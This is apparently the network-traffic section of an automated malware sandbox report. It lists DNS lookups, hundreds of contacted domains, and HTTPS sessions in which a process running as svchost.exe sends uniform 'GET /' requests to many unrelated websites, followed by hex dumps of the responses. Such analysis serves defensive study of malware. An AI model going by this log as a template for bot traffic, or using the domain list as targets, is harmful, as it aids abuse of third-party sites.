                                                                                                                                                                              Sep 15, 2023 07:28:39.988357067 CEST8.8.8.8192.168.2.30xfef2Server failure (2)actmin.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:40.657171011 CEST8.8.8.8192.168.2.30x92d0No error (0)kursavto.ru31.177.80.70A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:40.657171011 CEST8.8.8.8192.168.2.30x92d0No error (0)kursavto.ru31.177.76.70A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:40.880587101 CEST8.8.8.8192.168.2.30x17d2No error (0)cjcagent.com72.52.178.23A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:40.933703899 CEST8.8.8.8192.168.2.30x89a5No error (0)msl-lock.com165.160.15.20A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:40.933703899 CEST8.8.8.8192.168.2.30x89a5No error (0)msl-lock.com165.160.13.20A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:41.007621050 CEST8.8.8.8192.168.2.30xa875No error (0)mondopp.net173.231.184.124A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:41.095777988 CEST8.8.8.8192.168.2.30xef04Name error (3)pcoyuncu.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:41.129456043 CEST8.8.8.8192.168.2.30x2ed1No error (0)vdoherty.com91.216.241.100A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:41.194156885 CEST8.8.8.8192.168.2.30xa5f1Name error (3)pcoyuncu.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:41.296964884 CEST8.8.8.8192.168.2.30xbcafName error (3)pcoyuncu.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              • techtrans.de
                                                                                                                                                                              • clinicasanluis.com.co
                                                                                                                                                                              • pleszew.policja.gov.pl
                                                                                                                                                                              • diamir.de
                                                                                                                                                                              • orlyhotel.com
                                                                                                                                                                              • www.clinicasanluis.com.co
                                                                                                                                                                              • ldh.la.gov
                                                                                                                                                                              • hyab.se
                                                                                                                                                                              • dataform.co.uk
                                                                                                                                                                              • www.diamir.de
                                                                                                                                                                              • nts-web.net
                                                                                                                                                                              • www.muhr-soehne.de
                                                                                                                                                                              • www.jenco.co.uk
                                                                                                                                                                              • www.ftchat.com
                                                                                                                                                                              • www.dgmna.com
                                                                                                                                                                              • www.quadlock.com
                                                                                                                                                                              • www.pdqhomes.com
                                                                                                                                                                              • www.olras.com
                                                                                                                                                                              • www.pr-park.com
                                                                                                                                                                              • www.baijaku.com
                                                                                                                                                                              • www.alteor.cl
                                                                                                                                                                              • www.valdal.com
                                                                                                                                                                              • www.depalo.com
                                                                                                                                                                              • www.petsfan.com
                                                                                                                                                                              • www.elpro.si
                                                                                                                                                                              • www.credo.edu.pl
                                                                                                                                                                              • www.tvtools.fi
                                                                                                                                                                              • www.otena.com
                                                                                                                                                                              • www.evcpa.com
                                                                                                                                                                              • www.hummer.hu
                                                                                                                                                                              • www.wkhk.net
                                                                                                                                                                              • www.abdg.com
                                                                                                                                                                              • www.transsib.com
                                                                                                                                                                              • www.waldi.pl
                                                                                                                                                                              • www.xaicom.es
                                                                                                                                                                              • www.abart.pl
                                                                                                                                                                              • www.synetik.net
                                                                                                                                                                              • www.mqs.com.br
                                                                                                                                                                              • www.aevga.com
                                                                                                                                                                              • www.yocinc.org
                                                                                                                                                                              • www.ora.ecnet.jp
                                                                                                                                                                              • www.naoi-a.com
                                                                                                                                                                              • www.iamdirt.com
                                                                                                                                                                              • www.stnic.co.uk
                                                                                                                                                                              • www.wifi4all.nl
                                                                                                                                                                              • www.vitaindu.com
                                                                                                                                                                              • www.jacomfg.com
                                                                                                                                                                              • www.nelipak.nl
                                                                                                                                                                              • www.fcwcvt.org
                                                                                                                                                                              • www.gpthink.com
                                                                                                                                                                              • www.jchysk.com
                                                                                                                                                                              • www.valselit.com
                                                                                                                                                                              • www.snugpak.com
                                                                                                                                                                              • www.mobilnic.net
                                                                                                                                                                              • www.edimart.hu
                                                                                                                                                                              • www.dayvo.com
                                                                                                                                                                              • www.photo4b.com
                                                                                                                                                                              • www.2print.com
                                                                                                                                                                              • www.pcgrate.com
                                                                                                                                                                              • www.stajum.com
                                                                                                                                                                              • www.crcsi.org
                                                                                                                                                                              • www.x0c.com
                                                                                                                                                                              • www.fink.com
                                                                                                                                                                              • www.ora-ito.com
                                                                                                                                                                              • www.kernsafe.com
                                                                                                                                                                              • www.holleman.us
                                                                                                                                                                              • www.netcr.com
                                                                                                                                                                              • www.pupi.cz
                                                                                                                                                                              • www.nqks.com
                                                                                                                                                                              • www.lrsuk.com
                                                                                                                                                                              • www.ex-olive.com
                                                                                                                                                                              • www.myropcb.com
                                                                                                                                                                              • www.tyrns.com
                                                                                                                                                                              • www.yoruksut.com
                                                                                                                                                                              • www.spanesi.com
                                                                                                                                                                              • www.tc17.com
                                                                                                                                                                              • www.medius.si
                                                                                                                                                                              • www.ka-mo-me.com
                                                                                                                                                                              • www.item-pr.com
                                                                                                                                                                              • www.nunomira.com
                                                                                                                                                                              • www.com-sit.com
                                                                                                                                                                              • www.vexcom.com
                                                                                                                                                                              • www.sjbs.org
                                                                                                                                                                              • www.maktraxx.com
                                                                                                                                                                              • www.cel-cpa.com
                                                                                                                                                                              • www.fe-bauer.de
                                                                                                                                                                              • www.koz1.net
                                                                                                                                                                              • www.rs-ag.com
                                                                                                                                                                              • www.railbook.net
                                                                                                                                                                              • www.vazir.se
                                                                                                                                                                              • www.t-tre.com
                                                                                                                                                                              • www.cokocoko.com
                                                                                                                                                                              • www.speelhal.net
                                                                                                                                                                              • www.findbc.com
                                                                                                                                                                              • www.c9dd.com
                                                                                                                                                                              • www.domon.com
                                                                                                                                                                              • www.pwd.org
                                                                                                                                                                              • www.fnsds.org
                                                                                                                                                                              • www.pohlfood.com
                                                                                                                                                                              • www.11tochi.net
                                                                                                                                                                              • www.pb-games.com
                                                                                                                                                                              • www.sclover3.com
                                                                                                                                                                              • rkengg.com
                                                                                                                                                                              • scip.org.uk
                                                                                                                                                                              • dspears.com
                                                                                                                                                                              • s5w.com
                                                                                                                                                                              • johnlyon.org
                                                                                                                                                                              • portoccd.org
                                                                                                                                                                              • pellys.co.uk
                                                                                                                                                                              • shittas.com
                                                                                                                                                                              • bosado.com
                                                                                                                                                                              • agulatex.com
                                                                                                                                                                              • oozkranj.com
                                                                                                                                                                              • burstner.ru
                                                                                                                                                                              • ramkome.com
                                                                                                                                                                              • shanks.co.uk
                                                                                                                                                                              • shesfit.com
                                                                                                                                                                              • uhsa.edu.ag
                                                                                                                                                                              • kairel.com
                                                                                                                                                                              • floopis.com
                                                                                                                                                                              • flamingorecordings.com
                                                                                                                                                                              • semuk.com
                                                                                                                                                                              • angework.com
                                                                                                                                                                              • amic.at
                                                                                                                                                                              • avse.hu
                                                                                                                                                                              • ludea.cz
                                                                                                                                                                              • x96.com
                                                                                                                                                                              • mackusick.de
                                                                                                                                                                              • epc.com.au
                                                                                                                                                                              • akdeniz.nl
                                                                                                                                                                              • willsub.com
                                                                                                                                                                              • bount.com.tw
                                                                                                                                                                              • biurohera.pl
                                                                                                                                                                              • coxkitchensandbaths.com
                                                                                                                                                                              • hbfuels.com
                                                                                                                                                                              • banvari.com
                                                                                                                                                                              • 603888.com
                                                                                                                                                                              • web-york.com
                                                                                                                                                                              • likangds.com
                                                                                                                                                                              • revoldia.net
                                                                                                                                                                              • wanoa.com
                                                                                                                                                                              • wantapc.net
                                                                                                                                                                              • dyag-eng.com
                                                                                                                                                                              • shteeble.com
                                                                                                                                                                              • riwn.org
                                                                                                                                                                              • bossinst.com
                                                                                                                                                                              • icd-host.com
                                                                                                                                                                              • hubbikes.com
                                                                                                                                                                              • popbook.com
                                                                                                                                                                              • fogra.com.pl
                                                                                                                                                                              • nrsi.com
                                                                                                                                                                              • strazynski.pl
                                                                                                                                                                              • mackusick.com
                                                                                                                                                                              • beafin.com
                                                                                                                                                                              • fundeo.com
                                                                                                                                                                              • ncn.de
                                                                                                                                                                              • sigtoa.com
                                                                                                                                                                              • impexnc.com
                                                                                                                                                                              • cbaben.com
                                                                                                                                                                              • dhh.la.gov
                                                                                                                                                                              • scintel.com
                                                                                                                                                                              • magicomm.co.uk
                                                                                                                                                                              • lpver.com
                                                                                                                                                                              • k-nikko.com
                                                                                                                                                                              • metaforacom.com
                                                                                                                                                                              • dzm.cz
                                                                                                                                                                              • sledsport.ru
                                                                                                                                                                              • infotech.pl
                                                                                                                                                                              • indonesiamedia.com
                                                                                                                                                                              • bggs.com
                                                                                                                                                                              • vvsteknik.dk
                                                                                                                                                                              • okashimo.com
                                                                                                                                                                              • dbnet.at
                                                                                                                                                                              • sinwal.com
                                                                                                                                                                              • araax.com
                                                                                                                                                                              • muhr-soehne.de
                                                                                                                                                                              • roewer.de
                                                                                                                                                                              • insia.com
                                                                                                                                                                              • amerifor.com
                                                                                                                                                                              • skypearl.com
                                                                                                                                                                              • cvswl.org
                                                                                                                                                                              • pers.com
                                                                                                                                                                              • nettlinx.org
                                                                                                                                                                              • calvinly.com
                                                                                                                                                                              • stopllc.com
                                                                                                                                                                              • bidroll.com
                                                                                                                                                                              • mjrcpas.com
                                                                                                                                                                              • karila.fr
                                                                                                                                                                              • ludomemo.com
                                                                                                                                                                              • cbras.com
                                                                                                                                                                              • gbp-jp.com
                                                                                                                                                                              • vivastay.com
                                                                                                                                                                              • rappich.de
                                                                                                                                                                              • wvs-net.de
                                                                                                                                                                              • kavram.com
                                                                                                                                                                              • anduran.com
                                                                                                                                                                              • ftmobile.com
                                                                                                                                                                              • t-mould.com
                                                                                                                                                                              • nlcv.bas.bg
                                                                                                                                                                              • holp-ai.com
                                                                                                                                                                              • komie.com
                                                                                                                                                                              • univi.it
                                                                                                                                                                              • nettle.pl
                                                                                                                                                                              • hchc.org
                                                                                                                                                                              • esmoke.net
                                                                                                                                                                              • skgm.ru
                                                                                                                                                                              • adventist.ro
                                                                                                                                                                              • touchfam.ca
                                                                                                                                                                              • acraloc.com
                                                                                                                                                                              • msl-lock.com
                                                                                                                                                                              • siongann.com
                                                                                                                                                                              • fortknox.bm
                                                                                                                                                                              • absblast.com
                                                                                                                                                                              • ifesnet.com
                                                                                                                                                                              • jsaps.com
                                                                                                                                                                              • themark.org
                                                                                                                                                                              • noblesse.be
                                                                                                                                                                              • reproar.com
                                                                                                                                                                              • isom.org
                                                                                                                                                                              • ftchat.com
                                                                                                                                                                              • sidepath.com
                                                                                                                                                                              • shiner.com
                                                                                                                                                                              • leapc.com
                                                                                                                                                                              • xult.org
                                                                                                                                                                              • plaske.ua
                                                                                                                                                                              • aba.org.eg
                                                                                                                                                                              • smitko.net
                                                                                                                                                                              • workplus.hu
                                                                                                                                                                              • tcpoa.com
                                                                                                                                                                              • websy.com
                                                                                                                                                                              • captlfix.com
                                                                                                                                                                              • at-shun.com
                                                                                                                                                                              • e-kami.net
                                                                                                                                                                              • shztm.ru
                                                                                                                                                                              • sokuwan.net
                                                                                                                                                                              • dayvo.com
                                                                                                                                                                              • midap.com
                                                                                                                                                                              • valselit.com
                                                                                                                                                                              • yhsll.com
                                                                                                                                                                              • hazmatt.com
                                                                                                                                                                              • yasuma.com
                                                                                                                                                                              • cjborden.com
                                                                                                                                                                              • koz1.net
                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                              0192.168.2.350193185.237.66.112443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                                                                                              2023-09-15 05:27:23 UTC0OUTGET / HTTP/1.1
                                                                                                                                                                              Accept: *
                                                                                                                                                                              Accept-Language: en-us
                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                              Host: techtrans.de
                                                                                                                                                                              2023-09-15 05:27:23 UTC0INHTTP/1.1 403 Forbidden
                                                                                                                                                                              Date: Fri, 15 Sep 2023 05:27:23 GMT
                                                                                                                                                                              Server: Apache
                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                              Cache-Control: no-cache, no-store, must-revalidate
                                                                                                                                                                              Expires: 0
                                                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                                                              Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                              Referrer-Policy: strict-origin-when-cross-origin
                                                                                                                                                                              Content-Security-Policy: report-uri https://techtrans.de
                                                                                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                                                                                              Permissions-Policy: accelerometer=(), autoplay=(), camera=(), fullscreen=*, geolocation=(self), gyroscope=(), microphone=(), payment=*
                                                                                                                                                                              Upgrade: h2,h2c
                                                                                                                                                                              Connection: Upgrade, close
                                                                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                                                                              Access-Control-Allow-Methods: GET,PUT,POST,DELETE
                                                                                                                                                                              Access-Control-Allow-Headers: Content-Type, Authorization
                                                                                                                                                                              X-Content-Security-Policy: img-src *; media-src * data:;
                                                                                                                                                                              X-Permitted-Cross-Domain-Policies: none
                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                              2023-09-15 05:27:23 UTC1INData Raw: 32 63 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 27 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 27 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 4e 69 6e 6a 61 46 69 72 65 77 61 6c 6c 20 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 33 70 78 3b 63 6f 6c 6f 72 3a 23 30 30 30 3b 7d 3c 2f 73 74 79 6c 65 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 27 43 6f 6e 74 65 6e 74 2d 54 79 70 65 27 20 63 6f 6e 74 65 6e 74 3d 27 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 27 3e 3c 2f 68 65 61 64 3e 3c 62
                                                                                                                                                                              Data Ascii: 2c6<!DOCTYPE HTML PUBLIC '-//IETF//DTD HTML 2.0//EN'><html><head><title>NinjaFirewall 403 Forbidden</title><style>body{font-family:sans-serif;font-size:13px;color:#000;}</style><meta http-equiv='Content-Type' content='text/html; charset=utf-8'></head><b


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                              1192.168.2.350183172.67.164.178443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                                                                                              2023-09-15 05:27:23 UTC0OUTGET / HTTP/1.1
                                                                                                                                                                              Accept: *
                                                                                                                                                                              Accept-Language: en-us
                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                              Host: clinicasanluis.com.co
                                                                                                                                                                              2023-09-15 05:27:23 UTC18INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                              Date: Fri, 15 Sep 2023 05:27:23 GMT
                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                              Connection: close
                                                                                                                                                                              location: https://www.clinicasanluis.com.co/
                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                              x-turbo-charged-by: LiteSpeed
                                                                                                                                                                              CF-Cache-Status: DYNAMIC
                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Pk9FHptpYZkYg4VItrMmXOCqv1xVXAp47elzTCWcKA%2B3Pp8g%2B%2BQ3e52ulc%2FRd%2BRLbMO5U2XkOR1%2BTUvQcGNW%2BYY8bFYEwIjRNPb3XZikYRSKbIC76OCkDQYNJkF9RgAa2TBln2cAl%2FM%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                              CF-RAY: 806e75d29fa1c45c-EWR
                                                                                                                                                                              2023-09-15 05:27:23 UTC19INData Raw: 32 63 33 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c
                                                                                                                                                                              Data Ascii: 2c3<!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial,
                                                                                                                                                                              2023-09-15 05:27:23 UTC19INData Raw: 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a 0d 0a
                                                                                                                                                                              Data Ascii: ody></html>
                                                                                                                                                                              2023-09-15 05:27:23 UTC19INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                              10192.168.2.35026194.130.146.206443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                                                                                              2023-09-15 05:27:24 UTC64OUTGET / HTTP/1.1
                                                                                                                                                                              Accept: *
                                                                                                                                                                              Accept-Language: en-us
                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                              Host: www.diamir.de
                                                                                                                                                                              2023-09-15 05:27:24 UTC64INHTTP/1.1 403 Forbidden
                                                                                                                                                                              Server: nginx
                                                                                                                                                                              Date: Fri, 15 Sep 2023 05:27:24 GMT
                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                              Content-Length: 548
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                              Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                              2023-09-15 05:27:24 UTC65INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20
                                                                                                                                                                              Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                              11192.168.2.35025549.212.235.175443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                                                                                              2023-09-15 05:27:25 UTC65OUTGET / HTTP/1.1
                                                                                                                                                                              Accept: *
                                                                                                                                                                              Accept-Language: en-us
                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                              Host: nts-web.net
                                                                                                                                                                              2023-09-15 05:27:25 UTC267INHTTP/1.1 200 OK
                                                                                                                                                                              Server: nginx
                                                                                                                                                                              Date: Fri, 15 Sep 2023 05:27:25 GMT
                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                              Content-Length: 2599149
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Last-Modified: Tue, 08 Nov 2022 00:53:41 GMT
                                                                                                                                                                              ETag: "27a8ed-5eceaf89b8f40"
                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                              2023-09-15 05:27:25 UTC267INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 6a 61 22 3e 0a 20 20 3c 68 65 61 64 20 70 72 65 66 69 78 3d 22 6f 67 3a 20 68 74 74 70 3a 2f 2f 6f 67 70 2e 6d 65 2f 6e 73 23 20 66 62 3a 20 68 74 74 70 3a 2f 2f 6f 67 70 2e 6d 65 2f 6e 73 2f 66 62 23 20 77 65 62 73 69 74 65 3a 20 68 74 74 70 3a 2f 2f 6f 67 70 2e 6d 65 2f 6e 73 2f 77 65 62 73 69 74 65 23 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69
                                                                                                                                                                              Data Ascii: <!DOCTYPE html><html lang="ja"> <head prefix="og: http://ogp.me/ns# fb: http://ogp.me/ns/fb# website: http://ogp.me/ns/website#"> <meta charset="UTF-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="wi
                                                                                                                                                                              2023-09-15 05:27:25 UTC315INData Raw: 77 69 64 74 68 3a 31 2e 30 34 70 78 3b 7d 2e 63 6c 73 2d 31 36 31 2c 2e 63 6c 73 2d 31 36 32 2c 2e 63 6c 73 2d 31 36 33 7b 66 69 6c 6c 3a 23 39 32 64 31 64 37 3b 7d 2e 63 6c 73 2d 31 36 31 2c 2e 63 6c 73 2d 31 36 35 7b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 30 2e 39 37 70 78 3b 7d 2e 63 6c 73 2d 31 36 32 7b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 31 2e 31 35 70 78 3b 7d 2e 63 6c 73 2d 31 36 33 7b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 31 2e 32 35 70 78 3b 7d 2e 63 6c 73 2d 31 36 34 7b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 31 2e 35 34 70 78 3b 7d 2e 63 6c 73 2d 31 36 35 7b 66 69 6c 6c 3a 23 65 65 65 39 34 32 3b 7d 2e 63 6c 73 2d 31 36 36 7b 66 69 6c 6c 3a 23 65 34 38 32 37 65 3b 7d 2e 63 6c 73 2d 31 36 37 7b 66 69 6c 6c 3a 23 38 36 63 64 64 34 3b 7d 2e 63
                                                                                                                                                                              Data Ascii: width:1.04px;}.cls-161,.cls-162,.cls-163{fill:#92d1d7;}.cls-161,.cls-165{stroke-width:0.97px;}.cls-162{stroke-width:1.15px;}.cls-163{stroke-width:1.25px;}.cls-164{stroke-width:1.54px;}.cls-165{fill:#eee942;}.cls-166{fill:#e4827e;}.cls-167{fill:#86cdd4;}.c
                                                                                                                                                                              2023-09-15 05:27:25 UTC331INData Raw: 31 2c 2e 31 35 2c 32 2e 38 36 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 36 39 32 2e 38 33 2c 31 39 35 61 31 2e 37 32 2c 31 2e 37 32 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 33 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32 2e 34 2c 32 2e 34 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 32 2c 32 2e 31 32 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 36 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 36 39 32 2e 36 2c 31 38 38 2e 31 61 31 2e 37 32 2c 31 2e 37 32 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 33 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34
                                                                                                                                                                              Data Ascii: 1,.15,2.86"/><path class="cls-4" d="M692.83,195a1.72,1.72,0,0,1-.78,2.23,2.51,2.51,0,0,1-3.34-.94,2.4,2.4,0,0,1,.51-2.88,2.25,2.25,0,0,1,2.9,0,2.12,2.12,0,0,1,.16,2.86"/><path class="cls-4" d="M692.6,188.1a1.72,1.72,0,0,1-.78,2.23,2.51,2.51,0,0,1-3.34-.94
                                                                                                                                                                              2023-09-15 05:27:25 UTC352INData Raw: 32 2e 38 39 2c 32 2e 32 36 2c 32 2e 32 36 2c 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 33 2c 32 2e 31 33 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 36 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 37 32 33 2e 33 35 2c 32 36 33 2e 34 31 61 31 2e 37 31 2c 31 2e 37 31 2c 30 2c 30 2c 31 2d 2e 37 37 2c 32 2e 32 33 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32 2e 33 39 2c 32 2e 33 39 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 32 2c 32 2e 31 32 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 38 36 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 37 32 33 2e 31 32 2c 32 35 36 2e 34 38 61 31
                                                                                                                                                                              Data Ascii: 2.89,2.26,2.26,0,0,1,2.9,0,2.13,2.13,0,0,1,.16,2.86"/><path class="cls-4" d="M723.35,263.41a1.71,1.71,0,0,1-.77,2.23,2.51,2.51,0,0,1-3.34-.94,2.39,2.39,0,0,1,.51-2.88,2.25,2.25,0,0,1,2.9,0,2.12,2.12,0,0,1,.15,2.86"/><path class="cls-4" d="M723.12,256.48a1
                                                                                                                                                                              2023-09-15 05:27:25 UTC368INData Raw: 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 39 2c 32 2e
                                                                                                                                                                              Data Ascii: ,0,0,1,.51-2.89,2.
